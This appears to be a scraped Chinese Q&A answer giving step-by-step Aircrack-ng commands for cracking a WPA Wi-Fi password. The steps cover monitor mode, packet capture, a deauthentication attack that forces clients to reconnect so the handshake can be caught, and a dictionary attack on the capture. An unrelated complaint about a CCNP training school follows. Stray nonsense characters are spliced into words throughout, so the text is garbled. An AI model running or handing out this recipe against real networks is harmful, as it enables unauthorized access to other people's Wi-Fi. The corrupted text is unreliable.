可以的。
步骤如下:
0、进入Terminnal
1、开始监控wlan(airmon-ng是BT5的工具)
airmon-ng start wlan0
2、开始抓陵激渗包(test为抓到的包的文件命名)
airodump-ng 尺脊-w test mon0
3、监控制定信道(-c后跟的参数是哪个频道铅斗)
airodump-ng -c 11 -w test mon0
4、Deauth攻击(-0后跟的参数是攻击次数)
这个 *** 作主要是伪造数据包使客户端与无线路由器断链,从而重连,因此我们可以截获到中间的数据包)
aireplay-ng -0 5 -a MAC地址(BSSID) -c MAC地址(STATION) mon0
5、出现WPA handshake字段
6、开始指定字典进行破解(-w后跟的是字典路径,test-*.cap是指前面截获到的数据包)
aircrack-ng -w /pentest/passwords/wordlists/yeslab.lst test-*.cap
7、完成。
我在YESLAB报的CCNP,那个后悔啊!当初选择YESLAB主要是看到网上的那些学习资料了,都说他们的老师很牛很厉害、环境啊、费用什么的也还凑合就报了,谁知道根本就不是想象的那样。老余带语音的、秦珂老师是教安全键信的樱陆跟我们一点也塔不上啊。讲CCNP的我们那个讲师真不怎么样,听的我是着急啊,这不是耽误人嘛?设备也不全,怎么做实验啊稿颂轮?这也太坑人啦。欢迎分享,转载请注明来源:内存溢出
评论列表(0条)